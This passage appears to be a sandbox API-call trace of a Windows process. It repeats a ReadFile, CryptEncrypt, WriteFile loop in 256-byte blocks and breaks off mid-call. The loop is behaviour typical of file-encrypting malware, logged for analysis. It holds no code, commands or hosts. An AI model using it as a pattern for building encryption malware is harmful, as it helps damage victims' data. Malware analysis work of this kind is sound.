[0167.745] GetLastError () returned 0x0 [0167.745] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.745] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.746] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.746] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.746] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.746] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.747] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.747] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.747] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.747] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.748] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.748] GetLastError () returned 0x0 [0167.748] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.748] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.749] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.749] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.749] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.749] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.750] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.750] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.750] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 